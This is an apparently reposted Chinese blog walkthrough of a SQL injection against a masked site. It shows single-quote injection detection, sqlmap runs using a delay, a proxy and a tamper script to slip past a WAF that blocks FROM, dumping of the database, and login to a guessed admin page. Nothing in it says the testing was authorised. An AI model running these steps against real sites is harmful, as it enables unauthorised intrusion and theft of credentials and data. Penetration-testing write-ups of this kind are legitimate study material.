實戰|記一次SQL注入過WAF思路分享

  • 2019 年 11 月 20 日
  • 筆記

判斷注入點

輸入 ' –> 報錯

輸入 '' –> 回顯正常

可以確定是使用單引號閉合的

輸入 ' and '1'='1 –> 回顯正常, 可以查詢到數據

輸入 ' and '1'='2 –> 回顯正常, 但未查詢到數據

可以確定存在注入

接下來就是跑數據, 直接掏出sqlmap

sqlmap -u "http://www.xxx.com?id=2" --batch

一片紅!!! nice

再次訪問IP已經被封掉了

根據經驗推測應該是因為訪問過於頻繁導致的

開代理換個IP, 加個延時參數繼續

OK, 成功跑出注入點

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch








查詢當前資料庫用戶許可權, 不是高許可權, 所以只能去找Web後台管理員帳號密碼


sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --is-dba










查詢當前資料庫, 成功


sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --current-db










查詢表, 失敗


sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [庫名] --tables


嗯??? nice  


有WAF, 趕緊去訪問網站看看IP有沒有被封


還好, 沒有被封








顯示payload, 看看是哪句被攔截了


sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [庫名] --tables -v 3


可以看到第一次被攔截的payload








將被攔截的payload的放到瀏覽器中去訪問, 果然被WAF攔截了








手工模糊測試, 發現被攔截的為關鍵字: FROM








這裡說下個人思路:


    

  1. 在已經確定是什麼WAF的前提下, 網上去查詢過相關WAF的思路, 這裡我找到了幾個, 嘗試後還是沒有繞過去
    2. 

  2. sqlmap自帶有過WAF腳本, 我去查詢了下有沒有能代替<FROM>的其他關鍵字, 很遺憾沒找到
    3. 

  3. 然後考慮嘗試使用編碼, 注釋類的腳本去過, 經過反覆測試, 成功繞過
    4. 

  4. 查詢tamper腳本的相關文章鏈接: https://www.freebuf.com/sectool/179035.html
    5. 



sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [庫名] --tables -v 3 --tamper=halfversionedmorekeywords








接下來就簡單多了


查詢表–tables










查詢列–columns










查詢數據–dump










sqlmap跑數據的同時, 我去找了下後台


因為限制了訪問速度, 所以這裡我沒有選擇用御劍等工具去掃, 一般情況下可以先去做下目錄掃描


看看有沒有robots.txt文件, 404








搜索引擎搜索一波








找到一個會員登錄的頁面: http://www.xxx.com/login.aspx


額…, 一看會員登錄是這種文件名, 管理員後台也不會難找到哪裡去








順手在login.aspx前加了個admin


http://www.xxx.com/admin/login.aspx


特么的就訪問成功了…


所以這裡我得出了一個重要的結論: 運氣好等於成功了一半 (手動滑稽)








成功登錄, 至此測試結束


這裡不再進行深入測試







		  				

		  				

													


						
						
						


						 

							
					

					    
									

													

													
											


			


			


	

		
VirMach 便宜 VPS
 


QNews
 
QNews